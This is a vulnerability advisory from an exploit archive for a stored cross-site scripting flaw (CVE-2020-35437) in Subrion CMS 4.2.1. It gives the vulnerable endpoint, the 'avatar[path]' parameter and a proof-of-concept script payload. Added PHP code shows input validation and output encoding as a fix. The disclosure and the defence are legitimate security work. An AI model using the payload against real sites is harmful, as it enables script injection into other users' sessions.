## https://sploitus.com/exploit?id=PACKETSTORM:160783
# Exploit Title: Subrion CMS 4.2.1 - 'avatar[path]' XSS  
# Date: 2020-12-15  
# Exploit Author: icekam  
# Vendor Homepage: https://subrion.org/ <https://www.icekam.com/>  
# Software Link: https://github.com/intelliants/subrion  
# Version: Subrion CMS 4.2.1  
# CVE : CVE-2020-35437  
  
Stored XSS vulnerability in /_core/profile/.  
Reproduce through the avatar[path] parameter in a POST request to the /_core/profile/ URL.  
Payload: "><sCrIpT>alert(1)</sCrIpT>  
  
https://github.com/intelliants/subrion/issues/880
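
The `">` prefix in the payload suggests the stored value is written into a quoted HTML attribute without encoding. The following is an added example, not Subrion's code and not the vendor's fix; the function names, the `uploads/` prefix and the extension list are assumptions. It shows the two controls that stop this class of stored XSS in PHP: validate the path before storing it, and encode it for the attribute context on output.

```php
<?php
// Added example, not Subrion's code. Function names, the uploads/ prefix and
// the allowed extensions are assumptions made for illustration.

// Input side: accept only a relative path built from safe characters that
// ends in an image extension. Everything else is rejected before storage.
function is_safe_avatar_path(string $path): bool
{
    if ($path === '' || strlen($path) > 255) {
        return false;
    }
    // No directory traversal and no absolute paths.
    if (strpos($path, '..') !== false || $path[0] === '/') {
        return false;
    }
    // \z (not $) so a trailing newline cannot slip past the anchor.
    return preg_match('#^[A-Za-z0-9_\-./]+\.(?:png|jpe?g|gif|webp)\z#i', $path) === 1;
}

// Output side: encode for a quoted HTML attribute even if the value was
// validated, because rows stored before the check existed may be tainted.
function render_avatar_img(string $storedPath): string
{
    $safe = htmlspecialchars('uploads/' . $storedPath, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<img src="' . $safe . '" alt="avatar">';
}

// Constructed sample inputs: one benign path and the payload from the advisory.
$samples = [
    'a/avatar_42.png',
    '"><sCrIpT>alert(1)</sCrIpT>',
];

foreach ($samples as $value) {
    printf("%-32s accepted=%s\n", $value, is_safe_avatar_path($value) ? 'yes' : 'no');
    echo '  rendered: ', render_avatar_img($value), "\n";
}
```

Output encoding is the control that matters for data already in the database; the input check only keeps new malformed values out.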